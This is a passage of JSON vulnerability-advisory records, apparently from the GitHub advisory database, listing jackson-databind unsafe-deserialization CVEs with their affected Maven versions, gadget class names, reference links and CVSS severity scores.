"type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0fcef7321095ce0bc597d468d150cff3d647f4cb3aef3bd4d20e1c69@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40c00861b53bb611dee7d6f35f864aa7d1c1bd77df28db597cbf27e1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a360b46061c91c5cad789b6c3190aef9b9f223a2b75c9c9f046fe016@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ad0d238e97a7da5eca47a014f0f7e81f440ed6bf74a93183825e18b9@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc6b5cad721a4f6b3b62ed1163894941140d9d5656140fb757505ca0@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e90c3feb21702e68a8c08afce37045adb3870f2bf8223fa403fb93fb@%3Ccommits.hbase.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-09-19T09:22:56Z", "nvd_published_at": "2019-09-15T22:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-89qr-369f-5m5x", "published": "2021-12-09T19:15:46Z", "modified": "2024-02-18T05:37:27.581808Z", "aliases": [ "CVE-2020-36182" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", 
"2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-89qr-369f-5m5x/GHSA-89qr-369f-5m5x.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-89qr-369f-5m5x/GHSA-89qr-369f-5m5x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36182" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { 
"type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:58Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8c4j-34r4-xr8g", "published": "2021-12-09T19:16:18Z", "modified": "2024-02-18T05:31:52.762759Z", "aliases": [ "CVE-2020-36180" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", 
"2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-8c4j-34r4-xr8g/GHSA-8c4j-34r4-xr8g.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-8c4j-34r4-xr8g/GHSA-8c4j-34r4-xr8g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36180" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:36:46Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8w26-6f25-cm9x", "published": "2021-12-09T19:16:02Z", "modified": "2024-02-18T05:30:48.085017Z", "aliases": [ "CVE-2020-36185" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": 
"ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-8w26-6f25-cm9x/GHSA-8w26-6f25-cm9x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36185" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2998" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a" }, { "type": "WEB", "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:42Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-95cm-88f5-f2c7", "published": "2020-04-23T16:32:59Z", "modified": "2024-07-03T21:23:01.986952Z", "aliases": [ "CVE-2020-10672" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", 
"2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-95cm-88f5-f2c7/GHSA-95cm-88f5-f2c7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10672" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2659" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "type": "WEB", "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T21:12:55Z", "nvd_published_at": "2020-03-18T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, 
{ "schema_version": "1.7.3", "id": "GHSA-9gph-22xh-8x98", "published": "2021-12-09T19:15:54Z", "modified": "2024-02-18T05:33:27.617261Z", "aliases": [ "CVE-2020-36179" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9gph-22xh-8x98/GHSA-9gph-22xh-8x98.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", 
"2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9gph-22xh-8x98/GHSA-9gph-22xh-8x98.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36179" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3004" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:37:47Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9m6f-7xcq-8vf8", "published": "2021-12-09T19:16:34Z", "modified": "2024-02-18T05:32:25.400029Z", "aliases": [ "CVE-2020-36183" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.00" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9m6f-7xcq-8vf8/GHSA-9m6f-7xcq-8vf8.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", 
"ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9m6f-7xcq-8vf8/GHSA-9m6f-7xcq-8vf8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36183" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3003" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/12e23c962ffb4cf1857c5461d72ae54cc8008f29" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": 
